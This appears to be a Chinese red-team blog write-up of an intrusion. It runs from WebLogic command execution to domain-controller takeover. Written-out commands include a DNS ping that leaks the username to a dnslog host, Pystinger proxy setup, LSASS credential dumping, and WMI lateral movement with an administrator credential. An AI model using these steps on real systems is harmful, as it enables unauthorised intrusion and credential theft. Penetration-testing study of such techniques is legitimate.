当跳板机器不出网，如何不依赖 CobaltStrike 拿到域控？

大家好，这里是 渗透攻击红队 的第 67 篇文章，本公众号会记录一些红队攻击的案例，不定时更新

目标资产信息搜集的程度，决定渗透过程的复杂程度。

目标主机信息搜集的深度，决定后渗透权限持续把控。

渗透的本质是信息搜集，而信息搜集整理为后续的情报跟进提供了强大的保证。

----Micropoor

针对于不出网机器的内网渗透

前言

首先是拿到了一个 weblogic 的命令执行：

随后写了一个 webshell 为了后续有一个半交互的 shell：

通过信息搜集发现当前是存在域环境的：

发现当前机器 icmp 是不出网的：

但是通过发现当前机器 DNS 是出网的：

ping %USERNAME%.saulGoodman.dnslog.cn

既然 DNS 出网那可以直接配置 DNS 上线到 CS ！具体可以参考我这篇文章：【防溯源】如何通过域名 + CDN 完美隐藏你的 C2

由于我写过 DNS 上线相关的文章，在这里我就不使用 DNS + 域名 + CDN 上线到 CobaltStike 了，我尽量用没用过的手法让兄弟们多 Get 一些技巧！

Pystinger 在不出网的情况下如何使用

项目地址：https://github.com/FunnyWolf/pystinger

这个东东可以让 Webshell 实现内网 Socks4 代理，让不出网机器上线到 MSF/CS，使用 python 写的一款工具，支持目标站点 php、jsp（x）、aspx 三种脚本语言！

先上传对应的 Pystinger webshell 文件并成功访问：

然后我们还需要将 stinger_server.exe 上传到目标服务器 ，执行如下命令：

start stinger_server.exe 0.0.0.0

然后将 stinger_client 上传到 vps ，执行如下命令:

./stinger_client -w http://www.saulgoodman.cn/wls-wsat/proxy.jsp -l 0.0.0.0 -p 60000

但是发现失败了～到这里我回头使用 DNS 上线到 Cobaltstrike 也失败了，好家伙有毒～

没关系～我们不用这玩意也能继续搞打内网！

WMI 横向移动拿到域控

为了方便，我直接把目标 lsass 进程 dump 下来，然后本地解出明文密码：

成功抓到用户的明文（由于当前机器是 Windows 2003）所以可以直接抓明文：

这个时候域控的密码也被抓到了，域能直接拿到手！

其实到这里之前我在对域内进行信息搜集发现当前机器能和直接访问到域控的共享，首先是查看域控制器有哪些：

net group "domain controllers" /domain

发现只有这一台是域控：WIN-5CLDB63xxx$，随后 ping 域控机器名得到了域控的 IP：192.168.1.34

然后我对当前机器进行 IPC 信息搜集的时候发现，发现当前机器已经和域控有共享了：

随后可以直接访问到域控：

至此当前域已经拿下了，如果想要执行在域控机器上执行命令到话，可以直接用 wmi 横向：

cscript c:\bea\wmi.vbs /cmd 192.168.1.34 xxx\administrator "xxxITit" "whoami" 1

直接拿到域控权限！最后发现域控是出网机器：

内网渗透就是要好好信息搜集，其实刚拿到这个 webshell 的时候如果查看 net view 发现域控也在共享列表，那么就能够直接通过 IPC 拿到域控了，所以并不是非要把目标上线到 CobaltStrike 或者其他 C2 才能进行内网渗透！到这里这个内网域已经死了，就不上线到 CobaltStrike 了，太简单了！等有机会我遇到不出网的机器我再重写一篇，针对于不出网机器如何打内网，好了，祝兄弟们好运！